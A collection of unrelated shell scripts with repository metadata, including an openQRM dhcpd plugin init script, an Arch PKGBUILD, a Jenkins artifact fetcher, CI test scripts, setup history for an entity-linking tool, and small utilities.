cd covidbot # Move to the folder with the scripts and necessary files
# Now we do the actual deploy.
gcloud functions deploy covid19bot \
--region us-central1 \
--env-vars-file=keys.yaml \
--runtime python37 \
--trigger-http \
--entry-point main \
--memory 256MB \
--project $PROJECT
cd ..
| true
|
0148dc2cf731f9d36de96899adc5b98d62077dc2
|
Shell
|
thohal/openqrm
|
/trunk/src/plugins/dhcpd/etc/init.d/openqrm-plugin-dhcpd
|
UTF-8
| 7,096
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
# init script for the openQRM dhcpd plugin
#
# This file is part of openQRM.
#
# openQRM is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# as published by the Free Software Foundation.
#
# openQRM is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with openQRM. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2009, Matthias Rechenburg <matt@openqrm.com>
#
OPENQRM_SERVER_BASE_DIR=$(pushd $(dirname $0)/../../../../.. > /dev/null; echo $PWD; popd > /dev/null)
. $OPENQRM_SERVER_BASE_DIR/openqrm/etc/openqrm-server.conf
. $OPENQRM_SERVER_BASE_DIR/openqrm/include/openqrm-functions
. $OPENQRM_SERVER_BASE_DIR/openqrm/include/openqrm-server-functions
. $OPENQRM_SERVER_BASE_DIR/openqrm/plugins/dhcpd/include/openqrm-plugin-dhcpd-functions
. $OPENQRM_SERVER_BASE_DIR/openqrm/plugins/dhcpd/etc/openqrm-plugin-dhcpd.conf
function openqrm_plugin_dhcpd_start() {
echo "Starting the openQRM dhcpd-plugin"
openqrm_plugin_dhcpd_stop 1>/dev/null 2>&1
# on debian/ubuntu dhcpd ver.3 is named dhcpd3
if [ -x /usr/sbin/dhcpd3 ]; then
# fix for ubuntu jaunty which does not like the leass file in the plugin dir
if ! /usr/sbin/dhcpd3 -cf $OPENQRM_PLUGIN_DHCPD_CONF -lf $OPENQRM_PLUGIN_DHCPD_LEASE_DIR/dhcpd.leases 2>&1; then
/usr/sbin/dhcpd3 -cf $OPENQRM_PLUGIN_DHCPD_CONF 2>&1
RET=$?
else
RET=0
fi
elif [ -x /usr/sbin/dhcpd ]; then
/usr/sbin/dhcpd -cf $OPENQRM_PLUGIN_DHCPD_CONF -lf $OPENQRM_PLUGIN_DHCPD_LEASE_DIR/dhcpd.leases 2>&1
RET=$?
else
echo "ERROR: Could not find the dhcpd (ver.3) binary"
exit 1
fi
touch $OPENQRM_WEBSERVER_DOCUMENT_ROOT/openqrm/base/plugins/dhcpd/.running
return $RET
}
function openqrm_plugin_dhcpd_stop() {
echo "Stopping the openQRM dhcpd-plugin"
killall dhcpd 1>/dev/null 2>&1
killall dhcpd3 1>/dev/null 2>&1
rm -f $OPENQRM_WEBSERVER_DOCUMENT_ROOT/openqrm/base/plugins/dhcpd/.running
return 0
}
function openqrm_plugin_dhcpd_init() {
echo "Initializing the openQRM dhcpd-plugin"
openqrm_server_get_config
# create leases dir
mkdir -p $OPENQRM_PLUGIN_DHCPD_LEASE_DIR
touch $OPENQRM_PLUGIN_DHCPD_LEASE_DIR/dhcpd.leases
chmod -R 777 $OPENQRM_PLUGIN_DHCPD_LEASE_DIR
# calculate the defaults
OPENQRM_SERVER_NETWORK=`openqrm_plugin_dhcpd_get_netaddr $OPENQRM_SERVER_IP_ADDRESS $OPENQRM_SERVER_SUBNET_MASK`
IP1=`echo $OPENQRM_SERVER_NETWORK | cut -d'.' -f 1-3`
IP2=`echo $OPENQRM_SERVER_NETWORK | cut -d'.' -f 4`
IP2=$(( IP2 + 1 ))
OPENQRM_PLUGIN_DHCPD_IP_RANGE_FIRST="$IP1.$IP2"
IP1=`echo $OPENQRM_SERVER_BROADCAST_ADDRESS | cut -d'.' -f 1-3`
IP2=`echo $OPENQRM_SERVER_BROADCAST_ADDRESS | cut -d'.' -f 4`
IP2=$(( IP2 - 1 ))
OPENQRM_PLUGIN_DHCPD_IP_RANGE_LAST="$IP1.$IP2"
OPENQRM_SERVER_DNS=`cat /etc/resolv.conf | grep -m 1 "nameserver" | awk {' print $2 '} | head -n1 2>/dev/null`
OPENQRM_SERVER_DEFAULT_GATEWAY=`route -n | grep '^0.0.0.0' | grep $OPENQRM_SERVER_INTERFACE | awk {' print $2 '} | head -n1 2>/dev/null`
OPENQRM_SERVER_DOMAIN=`cat /etc/resolv.conf | grep -m 1 "search" | awk '{print $2'} | head -n1 2>/dev/null`
# make sure we have got values to put in the dhcpd.conf
if [ "$OPENQRM_SERVER_DEFAULT_GATEWAY" == "" ]; then
OPENQRM_SERVER_DEFAULT_GATEWAY=$OPENQRM_SERVER_IP_ADDRESS
if ! openqrm_validate_ip $OPENQRM_SERVER_DEFAULT_GATEWAY; then
OPENQRM_SERVER_DEFAULT_GATEWAY=$OPENQRM_SERVER_IP_ADDRESS
fi
fi
if [ "$OPENQRM_SERVER_DNS" == "" ]; then
OPENQRM_SERVER_DNS=$OPENQRM_SERVER_IP_ADDRESS
if ! openqrm_validate_ip $OPENQRM_SERVER_DNS; then
OPENQRM_SERVER_DNS=$OPENQRM_SERVER_IP_ADDRESS
fi
fi
if [ "$OPENQRM_SERVER_DOMAIN" == "" ]; then
OPENQRM_SERVER_DOMAIN=$OPENQRM_SERVER_DEFAULT_DOMAIN
fi
# create default dhcpd configuration
cat $OPENQRM_PLUGIN_DHCPD_CONF_TEMPLATE | \
sed -e "s/OPENQRM_SERVER_SUBNET_MASK/$OPENQRM_SERVER_SUBNET_MASK/g" | \
sed -e "s/OPENQRM_SERVER_SUBNET_MASK/$OPENQRM_SERVER_SUBNET_MASK/g" | \
sed -e "s/OPENQRM_SERVER_BROADCAST_ADDRESS/$OPENQRM_SERVER_BROADCAST_ADDRESS/g" | \
sed -e "s/OPENQRM_SERVER_DEFAULT_GATEWAY/$OPENQRM_SERVER_DEFAULT_GATEWAY/g" | \
sed -e "s/OPENQRM_SERVER_DOMAIN/$OPENQRM_SERVER_DOMAIN/g" | \
sed -e "s/OPENQRM_SERVER_DNS/$OPENQRM_SERVER_DNS/g" | \
sed -e "s/OPENQRM_SERVER_IP_ADDRESS/$OPENQRM_SERVER_IP_ADDRESS/g" | \
sed -e "s/OPENQRM_SERVER_NETWORK/$OPENQRM_SERVER_NETWORK/g" | \
sed -e "s/OPENQRM_PLUGIN_DHCPD_IP_RANGE_FIRST/$OPENQRM_PLUGIN_DHCPD_IP_RANGE_FIRST/g" | \
sed -e "s/OPENQRM_PLUGIN_DHCPD_IP_RANGE_LAST/$OPENQRM_PLUGIN_DHCPD_IP_RANGE_LAST/g" \
> $OPENQRM_PLUGIN_DHCPD_CONF
# enable apparmor if needed
if [ -f /etc/apparmor.d/usr.sbin.dhcpd3 ]; then
if ! grep openQRM /etc/apparmor.d/usr.sbin.dhcpd3 1>/dev/null; then
cat /etc/apparmor.d/usr.sbin.dhcpd3 |
sed -i -e "s#}##g" /etc/apparmor.d/usr.sbin.dhcpd3
echo " # openQRM" >> /etc/apparmor.d/usr.sbin.dhcpd3
echo " $OPENQRM_SERVER_BASE_DIR/openqrm/plugins/dhcpd/** rw," >> /etc/apparmor.d/usr.sbin.dhcpd3
if [ -d /etc/openqrm/plugins/dhcpd/ ]; then
echo " /etc/openqrm/plugins/dhcpd/** rw," >> /etc/apparmor.d/usr.sbin.dhcpd3
fi
echo "}" >> /etc/apparmor.d/usr.sbin.dhcpd3
echo >> /etc/apparmor.d/usr.sbin.dhcpd3
if [ -x "/etc/init.d/apparmor" ]; then
if [ -x "`which invoke-rc.d 2>/dev/null`" ]; then
invoke-rc.d apparmor reload || exit $?
else
/etc/init.d/apparmor reload || exit $?
fi
fi
fi
fi
# linking the web dir
ln -sf $OPENQRM_SERVER_BASE_DIR/openqrm/plugins/dhcpd/web $OPENQRM_WEBSERVER_DOCUMENT_ROOT/openqrm/base/plugins/dhcpd
return 0
}
function openqrm_plugin_dhcpd_uninstall() {
echo "Uninstalling the openQRM dhcpd-plugin"
openqrm_plugin_dhcpd_stop
# remove apparmor setup
if [ -f /etc/apparmor.d/usr.sbin.dhcpd3 ]; then
sed -i -e "s#.*openQRM.*##g" /etc/apparmor.d/usr.sbin.dhcpd3
sed -i -e "s#.*openqrm.*##g" /etc/apparmor.d/usr.sbin.dhcpd3
if [ -x "/etc/init.d/apparmor" ]; then
if [ -x "`which invoke-rc.d 2>/dev/null`" ]; then
invoke-rc.d apparmor reload || exit $?
else
/etc/init.d/apparmor reload || exit $?
fi
fi
fi
# unlinking the web dir
rm -f $OPENQRM_WEBSERVER_DOCUMENT_ROOT/openqrm/base/plugins/dhcpd
}
case "$1" in
start)
openqrm_plugin_dhcpd_start
;;
stop)
openqrm_plugin_dhcpd_stop
;;
restart)
openqrm_plugin_dhcpd_stop
sleep 1
openqrm_plugin_dhcpd_start
;;
init)
openqrm_plugin_dhcpd_init
;;
uninstall)
openqrm_plugin_dhcpd_uninstall
;;
*)
echo "Usage: $0 {start|stop|restart|init|uninstall}"
exit 1
esac
exit $?
| true
|
cf7ae22fbf75db1dcfc28f093f174b623a3c9ff7
|
Shell
|
cha63506/core-3
|
/modemmanager/PKGBUILD
|
UTF-8
| 1,204
| 2.921875
| 3
|
[] |
no_license
|
pkgname=modemmanager
_realname=ModemManager
pkgver=1.4.10
pkgrel=1
pkgdesc="Mobile broadband modem management service"
arch=('x86_64')
url="http://www.freedesktop.org/wiki/Software/ModemManager/"
license=('GPL2' 'LGPL2.1')
depends=('systemd' 'libgudev' 'polkit' 'ppp' 'python2' 'libqmi' 'libmbim' 'hicolor-icon-theme')
makedepends=('intltool' 'gobject-introspection' 'vala')
source=("http://www.freedesktop.org/software/${_realname}/${_realname}-${pkgver}.tar.xz"
"bus-signals.patch")
optdepends=('usb-modeswitch: install if your modem shows up as a storage drive')
md5sums=('1e46a148e2af0e9f503660fcd2d8957d'
'02aac68b3ef2ec1971f05300760ba4e5')
prepare() {
cd ModemManager-$pkgver
patch -Np1 -i ../bus-signals.patch
}
build() {
cd "$srcdir/${_realname}-${pkgver}"
./configure --prefix=/usr \
--sysconfdir=/etc \
--localstatedir=/var \
--with-udev-base-dir=/usr/lib/udev \
--with-polkit=permissive \
--disable-gtk-doc \
--disable-static
# https://bugzilla.gnome.org/show_bug.cgi?id=655517
sed -i -e 's/ -shared / -Wl,-O1,--as-needed\0/g' libtool
make
}
package() {
cd "$srcdir/${_realname}-${pkgver}"
make DESTDIR="$pkgdir" install
}
| true
|
b7d0ead489b199085d572dd1190eb6d74dbd0837
|
Shell
|
OddBloke/qa-scripts
|
/scripts/jenkins-get
|
UTF-8
| 2,607
| 4.4375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
VERBOSITY=0
TEMP_D=""
error() { echo "$@" 1>&2; }
fail() { local r=$?; [ $r -eq 0 ] && r=1; failrc "$r" "$@"; }
failrc() { local r=$1; shift; [ $# -eq 0 ] || error "$@"; exit $r; }
Usage() {
cat <<EOF
Usage: ${0##*/} [ options ] build-url
Download Jenkins artifacts and console from build-url
Example:
* ${0##*/} https://jenkins/server/job/cloud-init-integration-a/175
creates curtin-vmtest-proposed-a-artifacts.tar.xz
EOF
}
bad_Usage() { Usage 1>&2; [ $# -eq 0 ] || error "$@"; return 1; }
debug() {
local level=${1}; shift;
[ "${level}" -gt "${VERBOSITY}" ] && return
error "${@}"
}
cleanup() {
[ -z "${TEMP_D}" -o ! -d "${TEMP_D}" ] || rm -Rf "${TEMP_D}"
}
main() {
local short_opts="hv"
local long_opts="help,verbose"
local getopt_out=""
getopt_out=$(getopt --name "${0##*/}" \
--options "${short_opts}" --long "${long_opts}" -- "$@") &&
eval set -- "${getopt_out}" ||
{ bad_Usage; return; }
local cur="" next=""
local url=""
while [ $# -ne 0 ]; do
cur="$1"; next="$2";
case "$cur" in
-h|--help) Usage ; exit 0;;
-o|--output) output=$next; shift;;
-v|--verbose) VERBOSITY=$((${VERBOSITY}+1));;
--) shift; break;;
esac
shift;
done
[ $# -eq 1 ] || { bad_Usage "Expected 1 argument, got $# ($*)"; return; }
url="$1"
TEMP_D=$(mktemp -d "${TMPDIR:-/tmp}/${0##*/}.XXXXXX") ||
fail "failed to make tempdir"
trap cleanup EXIT
url="${url%/}/"
# url of format http://..../job/<name>/number
local burl="${url%%/job/*}/job"
local t="" t2=""
# t gets <project>/number[/*]
t="${url#${burl}/}"
local name="" number=""
set -- ${t//\// }
name=${1}
number=${2}
debug 1 "project-name=$name build-number=$number"
url="${burl}/$name/$number"
local ctmp="${TEMP_D}/$name-console.log"
local atmp="${TEMP_D}/$name-artifacts.zip"
local atxz="${TEMP_D}/$name-artifacts.tar.xz"
local aurl="$url/artifact/*zip*/archive.zip"
wget "$url/consoleText" -O "$ctmp" ||
fail "failed to download $url/consoleText"
wget "$aurl" -O "$atmp" ||
fail "failed download $aurl"
mkdir "${TEMP_D}/ex" &&
( cd "${TEMP_D}/ex" && unzip "${atmp}" ) ||
fail "failed to extract zip file from $aurl"
tar -C "${TEMP_D}/ex" -cJf "$atxz" . ||
fail "failed to create $atxz"
mv "$ctmp" "$atxz" . || fail "failed moving files to ."
error "wrote to ${ctmp##*/} ${atxz##*/}"
}
main "$@"
# vi: ts=4 expandtab syntax=sh
| true
|
209c200193a7c1aae66e867eb1529a49d1ceb35a
|
Shell
|
rapidsai/xgboost
|
/tests/buildkite/test-python-cpu.sh
|
UTF-8
| 491
| 2.5625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -euo pipefail
echo "--- Test CPU code in Python env"
source tests/buildkite/conftest.sh
mkdir -pv python-package/dist
buildkite-agent artifact download "python-package/dist/*.whl" . --step build-cuda
buildkite-agent artifact download "xgboost" . --step build-cpu
chmod +x ./xgboost
export BUILDKITE_ANALYTICS_TOKEN=$(get_aws_secret buildkite/test_analytics/cpu)
set_buildkite_env_vars_in_container
tests/ci_build/ci_build.sh cpu docker tests/ci_build/test_python.sh cpu
| true
|
a052c6555e67eea2ce2de3589c3f9bbf3a0e7890
|
Shell
|
macrovo/REL
|
/.bash_history
|
UTF-8
| 6,856
| 2.6875
| 3
|
[
"MIT"
] |
permissive
|
# INITIAL setup
apt-get install libomp-dev
apt-get install libopenblas-dev
apt-get install libomp-dev
pip3 install git+https://github.com/informagi/REL
pip3 install faiss
pip3 install flair
pip3 uninstall torch
pip3 install torch==1.6
pip3 install wikipedia2vec
pip3 install gensim=>3.8.0 -U
mkdir ~/rel && cd ~/rel
mkdir -p wiki_latest/basic_data/anchor_files
mkdir -p wiki_latest/generated/old
mkdir -p wiki_latest/generated/test_train_data
wget -c http://gem.cs.ru.nl/generic.tar.gz
wget -c http://gem.cs.ru.nl/wiki_2019.tar.gz
wget -c http://gem.cs.ru.nl/ed-wiki-2019.tar.gz
gunzip generic.tar.gz
gunzip ed-wiki-2019.tar.gz
gunzip wiki_2019.tar.gz
tar -xvf generic.tar
tar -xvf ed-wiki-2019.tar
tar -xvf wiki_2019.tar
#git clone https://github.com/informagi/REL.git
#pip uninstall REL
pip install git+https://github.com/informagi/REL
# This should work, test
nohup python3 rel.py &
python3 rel_test.py
# kill above rel.py process when updating below.
# UPDATING Wikipedia version: https://github.com/informagi/REL/tree/master/tutorials/deploy_REL_new_Wiki
#best to name folder wiki_latest, and then don't need to grep / sed all the py / bash files.. simply replace latest wiki dump
cd ~/rel
wget -c https://dumps.wikimedia.org/enwiki/20210901/enwiki-20210901-pages-articles-multistream.xml.bz2
#We will need both comressed and uncompressed versions
cp enwiki-20210901-pages-articles-multistream.xml.bz2 enwiki-latest-pages-articles-multistream.xml.bz2
cp enwiki-latest-pages-articles-multistream.xml.bz2 wiki_corpus.xml.bz2
bzip2 -dk enwiki-latest-pages-articles-multistream.xml.bz2
#https://github.com/informagi/REL/blob/master/tutorials/deploy_REL_new_Wiki/04_01_Extracting_a_new_Wikipedia_corpus.md
cd REL/
find -name WikiExtractor.py
cp REL/scripts/WikiExtractor.py wiki_latest/basic_data/
mv enwiki-latest-pages-articles-multistream.xml wiki_latest/basic_data/
cd wiki_latest/basic_data/
mv enwiki-latest-pages-articles-multistream.xml wiki_corpus.xml
nohup python3 WikiExtractor.py ./wiki_corpus.xml --links --filter_disambig_pages --processes 1 --bytes 1G &
mv wiki_corpus.xml anchor_files/
#can move this segment to initial setup above, as renamed from 2021 to latest
cd code_tutorials/
grep base_url *.py
sed -i 's/base_url = ""/base_url = "\/root\/rel\/"/g' *.py
sed -i 's/wiki_2019/wiki_latest/g' *.py
cd ~/rel/REL/scripts/code_tutorials/
grep -rn "base_url = " --include="*.py" /root/rel/
find /root/rel/ -type f | xargs sed -i 's/base_url = "\/Users\/vanhulsm\/Desktop\/projects\/data\/"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "\/Users\/vanhulsm\/Desktop\/projects\/data\/"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "\/users\/vanhulsm\/Desktop\/projects\/data\/"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "\/users\/vanhulsm\/Desktop\/projects\/data"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "C:\/Users\/mickv\/Desktop\/data_back\/"/base_url = "\/root\/rel\/"/g'
find /root/rel/ -type f -name '*.py' | xargs sed -i 's/base_url = "C:\/Users\/mickv\/desktop\/data_back\/"/base_url = "\/root\/rel\/"/g'
cd /usr/local/lib/python3.6/dist-packages/REL/
grep -rn "base_url = " --include="*.py" .
#move above this segment
cd /root/rel/REL/scripts/code_tutorials/
cd ~/rel/wiki_latest/basic_data/
mv wiki_corpus.xml ..
mv ../text/AA/wiki_* .
cd ~/rel/REL/scripts/code_tutorials/
python3 generate_p_e_m.py
# now run py code from above link-graph, may be in generate_p_e_m.py.. have to check.
#https://github.com/informagi/REL/blob/master/tutorials/deploy_REL_new_Wiki/04_02_training_your_own_embeddings.md
cd REL/scripts/w2v/
cat preprocess.sh | tr -d '\r' > preprocess2.sh
chmod +x preprocess2.sh
cd ~/rel/wiki_latest/basic_data/
mv wiki_corpus.xml.bz2 enwiki-pages-articles.xml.bz2
chmod +w enwiki-pages-articles.xml.bz2 && chmod +x enwiki-pages-articles.xml.bz2
cd ~/rel/REL/scripts/w2v
#commented out 1st command with joe
joe preprocess2.sh
#that command line from preprocess2.sh manually
wikipedia2vec build-dump-db /root/rel/wiki_latest/basic_data/ wiki_corpus.xml.bz2
#rest
nohup ./preprocess2.sh &
#from train.sh, modified
nohup /root/.local/bin/wikipedia2vec train --min-entity-count 0 --disambi ~/rel/wiki_latest/basic_data/enwiki-pages-articles.xml.bz2 wikipedia2vec_trained &
nohup /root/.local/bin/wikipedia2vec train-embedding dump_file dump_dict wikipedia2vec_trained --link-graph dump_graph --mention-db dump_mention --dim-size 300 &
nohup /root/.local/bin/wikipedia2vec save-text --out-format word2vec wikipedia2vec_trained wikipedia2vec_wv2vformat &
#now run py code from above link, replace enwiki_w2v_model with wikipedia2vec_wv2vformat
#https://github.com/informagi/REL/blob/master/tutorials/deploy_REL_new_Wiki/04_03_generating_training_test_files.md
cd ~/rel
grep -r -i --include \*.py 'emb.load_word2emb' .
#i think i didn't edit anything here!
joe ./REL/REL/db/generic.py
#move this to initial setup above
cd ~/rel/generic/test_datasets/wned-datasets/wikipedia/RawText
mv Harvard_Crimson_men_s_lacrosse "Harvard_Crimson_men's_lacrosse"
mv "Zielona_Gвra_(parliamentary_constituency)" "Zielona_Góra_(parliamentary_constituency)"
mv "Mary_O_Connor_(sportsperson)" "Mary_O'Connor_(sportsperson)"
mv "Florida_Gulf_Coast_Eagles_men_s_basketball" "Florida_Gulf_Coast_Eagles_men's_basketball"
mv "Chippenham_United_F.C_" "Chippenham_United_F.C."
mv Czech_Republic_men_s_national_ice_hockey_team "Czech_Republic_men's_national_ice_hockey_team"
mv Love_s_Welcome_at_Bolsover "Love's_Welcome_at_Bolsover"
mv Ya_akov_Riftin "Ya'akov_Riftin"
mv CA_Saint-Рtienne_Loire_Sud_Rugby "CA_Saint-Étienne_Loire_Sud_Rugby"
mv Jeanne_d_Рvreux "Jeanne_d'Évreux"
mv "Rбo_Verde,_Chile" "Río_Verde,_Chile"
mv "Law___Order_(season_16)" "Law_&_Order_(season_16)"
mv "Love___Life_(Mary_J._Blige_album)" "Love_&_Life_(Mary_J._Blige_album)"
mv WБrttemberger "Württemberger"
mv ChГteau_d_Oiron "Château_d'Oiron"
mv "Krasi,_Thalassa_Kai_T__Agori_Mou" "Krasi,_Thalassa_Kai_T'_Agori_Mou"
mv "Alfred_Conkling_Coxe,_Sr_" "Alfred_Conkling_Coxe,_Sr."
mv "Clara_NordstrФm" "Clara_Nordström"
mv "Hittin__the_Trail_for_Hallelujah_Land" "Hittin'_the_Trail_for_Hallelujah_Land"
mv JosВ_Evangelista "José_Evangelista"
mv Putin_s_rynda "Putin's_rynda"
#commenced out #"wned-clueweb",
joe /usr/local/lib/python3.6/dist-packages/REL/training_datasets.py
rm -rf /usr/local/lib/python3.6/dist-packages/REL/__pycache__
#move above this segment
#now run py code from above link
#https://github.com/informagi/REL/blob/master/tutorials/deploy_REL_new_Wiki/04_04_training_your_own_ED_model.md
#run py codes from above link
#this should work now with latest dump
nohup python3 rel.py &
python3 rel_test.py
| true
|
47e65cfff5eff9f4850ff66b44e791df013ff42f
|
Shell
|
MicroFire33/ssdv2
|
/prerequis.sh
|
UTF-8
| 1,485
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
###############################################################
if [ "$USER" != "root" ]; then
echo "Ce script doit être lancé en sudo ou par root !"
exit 1
fi
# Absolute path to this script.
CURRENT_SCRIPT=$(readlink -f "$0")
# Absolute path this script is in.
export SCRIPTPATH=$(dirname "$CURRENT_SCRIPT")
cd ${SCRIPTPATH}
readonly PIP="9.0.3"
readonly ANSIBLE="2.9"
${SCRIPTPATH}/includes/config/scripts/prerequis_root.sh ${SCRIPTPATH}
## Install pip3 Dependencies
python3 -m pip install --user --disable-pip-version-check --upgrade --force-reinstall \
pip==${PIP}
python3 -m pip install --user --disable-pip-version-check --upgrade --force-reinstall \
setuptools
python3 -m pip install --user --disable-pip-version-check --upgrade --force-reinstall \
pyOpenSSL \
requests \
netaddr \
jmespath \
ansible==${1-$ANSIBLE} \
docker
## Copy pip to /usr/bin
rm -f /usr/bin/pip3
ln -s ${HOME}/.local/bin/pip3 /usr/bin/pip3
ln -s ${HOME}/.local/bin/pip3 /usr/bin/pip
${HOME}/.local/bin/ansible-playbook includes/config/playbooks/sudoers.yml
${HOME}/.local/bin/ansible-playbook includes/config/roles/users/tasks/main.yml
echo "---------------------------------------"
echo "Si c'est la première fois que vous lancez ce script, il est TRES FORTEMENT conseillé de redémmarer le serveur avant de continuer"
echo "Vous pourrez ensuite lancer "
echo "cd /opt/seedbox-compose"
echo "./seedbox.sh "
echo "pour installer la seedbox"
touch ${SCRIPTPATH}/.prerequis.lock
| true
|
115ba543c8704af8812fe37ced436c6cf7f29632
|
Shell
|
wangpanqiao/VDR_CHIPEXO
|
/do_liftover_bed_bdg_cluster.sh
|
UTF-8
| 3,396
| 3.40625
| 3
|
[] |
no_license
|
#!/bin/bash
#script to do liftover from hg18 to hg19 for multiple bed files
#eg /net/isi-backup/giuseppe/scripts/liftOver GM_consensus_slop_1000.bed /net/isi-scratch/giuseppe/GATK_RESOURCES/chain/hg19tob37.chain GM_consensus_slop_1000_liftover19_37.bed unlifted_1000.bed
#liftOver - Move annotations from one assembly to another
#usage:
# liftOver oldFile map.chain newFile unMapped
#oldFile and newFile are in bed format by default, but can be in GFF and
#maybe eventually others with the appropriate flags below.
#The map.chain file has the old genome as the target and the new genome
#as the query.
#
#***********************************************************************
#WARNING: liftOver was only designed to work between different
# assemblies of the same organism, it may not do what you want
# if you are lifting between different organisms.
#***********************************************************************
#
#options:
# -minMatch=0.N Minimum ratio of bases that must remap. Default 0.95
# -gff File is in gff/gtf format. Note that the gff lines are converted
# separately. It would be good to have a separate check after this
# that the lines that make up a gene model still make a plausible gene
# after liftOver
# -genePred - File is in genePred format
# -sample - File is in sample format
# -bedPlus=N - File is bed N+ format
# -positions - File is in browser "position" format
# -hasBin - File has bin value (used only with -bedPlus)
# -tab - Separate by tabs rather than space (used only with -bedPlus)
# -pslT - File is in psl format, map target side only
# -minBlocks=0.N Minimum ratio of alignment blocks or exons that must map
# (default 1.00)
# -fudgeThick (bed 12 or 12+ only) If thickStart/thickEnd is not mapped,
# use the closest mapped base. Recommended if using
# -minBlocks.
# -multiple Allow multiple output regions
# -minChainT, -minChainQ Minimum chain size in target/query, when mapping
# to multiple output regions (default 0, 0)
# -minSizeT deprecated synonym for -minChainT (ENCODE compat.)
# -minSizeQ Min matching region size in query with -multiple.
# -chainTable Used with -multiple, format is db.tablename,
# to extend chains from net (preserves dups)
# -errorHelp Explain error messages
if [ ! $# == 4 ]; then
echo "Usage: `basename $0` <PATH> <EXT> <CHAIN> <STRING>"
echo "<PATH> Directory containing the data files (e.g. /home/me/files)"
echo "<EXT> file extension (e.g. bed, bedgraph, bdg)"
echo "<CHAIN> full path to chain file to use"
echo "<STRING> mnemonic string to use for lifted over files (eg hg19)"
exit
fi
PDATA=$1;
EXT=$2;
PCHAIN=$3;
PSTRING=$4;
PCODE="/net/isi-backup/giuseppe/scripts";
for FILE in ${PDATA}/*.${EXT};
do
ID=`basename ${FILE} ".${EXT}"`;
SCRIPT=liftover_${ID}.sh;
echo '#!/bin/bash' >>${PDATA}/${SCRIPT};
echo '' >>${PDATA}/${SCRIPT};
echo "${PCODE}/liftOver ${FILE} ${PCHAIN} ${PDATA}/${ID}_${PSTRING}.${EXT} ${PDATA}/${ID}_unmapped.${EXT}" >>${PDATA}/${SCRIPT};
nice -5 qsub -e ${PDATA}/liftover_${ID}.err -o ${PDATA}/liftover_${ID}.out -q newnodes.q ${PDATA}/${SCRIPT};
rm ${PDATA}/${SCRIPT};
done
| true
|
32a3ad3b7a79ceee3d29111526dd8bdd99035d7a
|
Shell
|
ianthehenry/httprintf
|
/scripts/http-handler
|
UTF-8
| 1,407
| 3.921875
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env sh
log() {
echo "$1" >&2
}
tee1() {
awk 'NR==1 {print $0 > "/dev/stderr"} {print $0}'
}
tryinvoke() {
if [ -x "$1" ]; then
log " $1 $2 $3"
"$1" "$2" "$3" | tee1
return 0
else if [ -f "$1" ]; then
log " $1 exists but is not executable"
fi fi
return 1
}
paths() {
local method="$1"
local path="$2"
case "$path" in
*/) local directory=1; path=${path%*/}; local file="";;
*) local directory=0;;
esac
if [ "$directory" -eq 1 ]; then
tryinvoke "$path/$method" "." "$method"
if [ $? -eq 0 ]; then
return 0
fi
fi
while true; do
if [ -z ${file+x} ]; then
local file="$(basename "$path")"
else
local file="$(basename "$path")/$file"
fi
local path="$(dirname "$path")"
tryinvoke "$path/$method" "./$file" "$method"
if [ $? -eq 0 ]; then
return 0
fi
if [ "$path" = "." ]; then
break
fi
done
return 1
}
request="$(head -n1)"
method="$(printf %s "$request" | awk '{ print $1 }')"
path="$(printf %s "$request" | awk '{ print $2 }')"
printf "%s %s\n" "$(date "+%H:%M:%S")" "$request" >&2
paths "$method" ".$path"
if [ $? -eq 0 ]; then
exit 0
fi
paths "ANY" ".$path"
if [ $? -eq 0 ]; then
exit 0
fi
log " no match"
printf " " >&2
http-status 405 | tee1
http-header "Allow" ""
http-header "Content-Length" "20"
http-begin-body
echo "No matching handler."
| true
|
35afb9207e25331c9f2f166e170c7122351f9757
|
Shell
|
perfectfoolish/abs
|
/array-function.sh
|
UTF-8
| 2,116
| 4.625
| 5
|
[] |
no_license
|
#!/bin/bash
# array-function.sh: Passing an array to a function and ...
# "returning" an array from a function
Pass_Array ()
{
local passed_array # Local variable!
passed_array=( `echo "$1"` )
echo "${passed_array[@]}"
# List all the elements of the new array
#+ declared and set within the function.
}
original_array=( element1 element2 element3 element4 element5 )
echo
echo "original_array = ${original_array[@]}"
# List all elements of original array.
# This is the trick that permits passing an array to a function.
# **********************************
argument=`echo ${original_array[@]}`
# **********************************
# Pack a variable
#+ with all the space-separated elements of the original array.
#
# Attempting to just pass the array itself will not work.
# This is the trick that allows grabbing an array as a "return value".
# *****************************************
returned_array=( `Pass_Array "$argument"` )
# *****************************************
# Assign 'echoed' output of function to array variable.
echo "returned_array = ${returned_array[@]}"
echo "============================================================="
# Now, try it again,
#+ attempting to access (list) the array from outside the function.
Pass_Array "$argument"
# The function itself lists the array, but ...
#+ accessing the array from outside the function is forbidden.
echo "Passed array (within function) = ${passed_array[@]}"
# NULL VALUE since the array is a variable local to the function.
echo
############################################
# And here is an even more explicit example:
ret_array ()
{
for element in {11..20}
do
echo "$element " # Echo individual elements
done #+ of what will be assembled into an array.
}
arr=( $(ret_array) ) # Assemble into array.
echo "Capturing array \"arr\" from function ret_array () ..."
echo "Third element of array \"arr\" is ${arr[2]}." # 13 (zero-indexed)
echo -n "Entire array is: "
echo ${arr[@]} # 11 12 13 14 15 16 17 18 19 20
echo
exit 0
| true
|
2e775ecdcf46c0803fe757c35cde598d9b1c80d4
|
Shell
|
huyn03/fastinstall
|
/install.sh
|
UTF-8
| 7,085
| 3.59375
| 4
|
[] |
no_license
|
#!/bin/sh
_TMPDIR="/usr/tmp"
_PATH="https://raw.githubusercontent.com/huyn03/fastinstall/master"
function installNotExists(){
$(rpm -q "$packages" | grep -e "not installed" | awk 'BEGIN { FS = " " } ; { printf $2" "}' > list.txt)
